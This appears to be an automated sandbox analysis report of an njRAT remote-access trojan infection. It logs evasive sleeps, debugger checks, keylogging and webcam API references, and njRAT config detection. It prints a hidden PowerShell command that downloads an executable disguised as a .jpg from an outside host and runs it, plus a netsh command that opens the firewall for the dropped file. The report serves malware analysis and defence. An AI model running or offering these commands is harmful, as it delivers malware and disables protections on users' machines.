Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\exploit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\exploit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\exploit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\exploit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\exploit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\exploit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\exploit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\exploit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\exploit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\exploit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\exploit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\exploit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\exploit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\exploit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\exploit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\exploit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\exploit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\exploit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\exploit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\exploit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\exploit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\exploit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\exploit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\exploit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Contains long sleeps (>= 3 min)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\exploit.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Enumerates the file system

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Show sources

Source: C:\Windows\System32\mshta.exe	Window / User API: threadDelayed 764			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Window / User API: threadDelayed 4463			Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Show sources

Source: C:\Windows\System32\dllhost.exe TID: 924	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\verclsid.exe TID: 1076	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\verclsid.exe TID: 1076	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\mshta.exe TID: 1904	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\mshta.exe TID: 372	Thread sleep count: 764 > 30	Jump to behavior
Source: C:\Windows\System32\mshta.exe TID: 372	Thread sleep time: -45840000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\mshta.exe TID: 372	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\mshta.exe TID: 1912	Thread sleep time: -420000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2360	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\exploit.exe TID: 2800	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe TID: 2144	Thread sleep count: 4463 > 30	Jump to behavior
Source: C:\Windows\System32\netsh.exe TID: 4056	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe TID: 3248	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe TID: 3548	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe TID: 3396	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe TID: 1956	Thread sleep time: -60000s >= -30000s	Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Show sources

Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Last function: Thread delayed

Queries a list of all running processes

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))

Show sources

Source: C:\Windows\System32\dllhost.exe

System information queried: KernelDebuggerInformation

Jump to behavior

Enables debug privileges

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Process token adjusted: Debug			Jump to behavior

Creates guard pages, often used to prevent reverse engineering and debugging

Show sources

Source: C:\Users\user\AppData\Local\Temp\exploit.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

.NET source code references suspicious native API functions

Show sources

Source: exploit.exe.9.dr, OK.cs	Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: exploit.exe.9.dr, kl.cs	Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: dllhost.exe.10.dr, OK.cs	Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: dllhost.exe.10.dr, kl.cs	Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 10.2.exploit.exe.1d0000.0.unpack, OK.cs	Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: 10.2.exploit.exe.1d0000.0.unpack, kl.cs	Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 10.0.exploit.exe.1d0000.0.unpack, OK.cs	Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: 10.0.exploit.exe.1d0000.0.unpack, kl.cs	Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: bde52a20d668d6f304b9db902c7cfc6b.exe.11.dr, OK.cs	Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: bde52a20d668d6f304b9db902c7cfc6b.exe.11.dr, kl.cs	Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 11.0.dllhost.exe.210000.0.unpack, OK.cs	Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: 11.0.dllhost.exe.210000.0.unpack, kl.cs	Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 11.2.dllhost.exe.210000.0.unpack, OK.cs	Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: 11.2.dllhost.exe.210000.0.unpack, kl.cs	Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 15.0.dllhost.exe.210000.0.unpack, OK.cs	Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: 15.0.dllhost.exe.210000.0.unpack, kl.cs	Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 15.2.dllhost.exe.210000.0.unpack, OK.cs	Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: 15.2.dllhost.exe.210000.0.unpack, kl.cs	Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 16.0.dllhost.exe.210000.0.unpack, OK.cs	Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: 16.0.dllhost.exe.210000.0.unpack, kl.cs	Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 16.2.dllhost.exe.210000.0.unpack, OK.cs	Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: 16.2.dllhost.exe.210000.0.unpack, kl.cs	Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')

Creates a process in suspended mode (likely to inject code)

Show sources

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell.exe -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://1.top4top.net/p_1301n6ked1.jpg','C:\Users\user\AppData\Local\Temp\exploit.exe');Start-Process 'C:\Users\user\AppData\Local\Temp\exploit.exe'

Jump to behavior

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device

Show sources

Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior

Queries the cryptographic machine GUID

Show sources

Source: C:\Windows\System32\verclsid.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

Modifies the windows firewall

Show sources

Source: unknown

Process created: C:\Windows\System32\netsh.exe netsh firewall add allowedprogram 'C:\Users\user\AppData\Local\Temp\dllhost.exe' 'dllhost.exe' ENABLE

Uses netsh to modify the Windows network and firewall settings

Show sources

Source: unknown

Process created: C:\Windows\System32\netsh.exe netsh firewall add allowedprogram 'C:\Users\user\AppData\Local\Temp\dllhost.exe' 'dllhost.exe' ENABLE

Remote Access Functionality:

Detected njRat

Show sources

Source: exploit.exe.9.dr, OK.cs	.Net Code: njRat config detected
Source: dllhost.exe.10.dr, OK.cs	.Net Code: njRat config detected
Source: 10.2.exploit.exe.1d0000.0.unpack, OK.cs	.Net Code: njRat config detected
Source: 10.0.exploit.exe.1d0000.0.unpack, OK.cs	.Net Code: njRat config detected
Source: bde52a20d668d6f304b9db902c7cfc6b.exe.11.dr, OK.cs	.Net Code: njRat config detected
Source: 11.0.dllhost.exe.210000.0.unpack, OK.cs	.Net Code: njRat config detected
Source: 11.2.dllhost.exe.210000.0.unpack, OK.cs	.Net Code: njRat config detected
Source: 15.0.dllhost.exe.210000.0.unpack, OK.cs	.Net Code: njRat config detected
Source: 15.2.dllhost.exe.210000.0.unpack, OK.cs	.Net Code: njRat config detected
Source: 16.0.dllhost.exe.210000.0.unpack, OK.cs	.Net Code: njRat config detected
Source: 16.2.dllhost.exe.210000.0.unpack, OK.cs	.Net Code: njRat config detected

Signature Similarity

Sample Distance (10 = nearest)

10 9 8 7 6 5 4 3 2 1

Similar Samples

Samplename	Analysis ID	SHA256	Similarity

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Simulations

Behavior and APIs

Time	Type	Description
19:55:29	API Interceptor	547x Sleep call for process: dllhost.exe modified
19:55:53	API Interceptor	6x Sleep call for process: verclsid.exe modified
